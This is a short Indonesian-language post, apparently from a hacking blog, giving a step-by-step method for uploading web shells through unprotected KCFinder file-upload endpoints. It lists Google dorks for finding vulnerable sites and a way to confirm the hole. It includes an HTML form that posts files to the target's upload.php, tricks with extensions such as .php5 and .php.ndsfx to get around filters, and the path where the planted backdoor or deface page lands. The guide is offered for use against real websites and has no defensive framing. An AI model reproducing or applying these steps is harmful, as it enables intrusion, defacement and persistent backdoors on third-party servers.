KCFinder Shell Upload
Google Dork :
inurl:/kcfinder/browse.php
lib/kcfinder/files/upload
admin/kcfinder/files/upload
panel/kcfinder/upload/files
editor/kcfinder/upload
Kcfinder/upload/files
(selebihnya use ur briant)
Exploit :
www.site.com/path/kcfinder/upload.php
Jika tertulis ' Unknown error ' berarti itu vlun, jika bukan berarti tidak :D
Copy dan paste script CSRF di bawah, berformat html
<form method="POST" action="http://site.com/path/kcfinder/upload.php"
enctype="multipart/form-data">
<input type="file" name="Filedata" /><button>Hajar !</button>
</form>
Upload script deface kamu atau shell backdoor kamu...
tapi sebelum tanam shell, format harus di ganti ndsfx atau .php5 >> shell.php.ndsfx
Recomed shell [ shell.php2 & shell.php5 & shell.php.black & shell.shtml & scriptdeface.html ]
Ext shell yg sering tidak bisa di upload =>"exe , com , msi , bat , php , phps , phtml , php3 , php4 , cgi , pl"
Letak shell / Defpage : www.site.com/[path]/kcfinder/upload/files/shelllu.php.ndsfx/etc
Semoga Bermanfaat
Post a Comment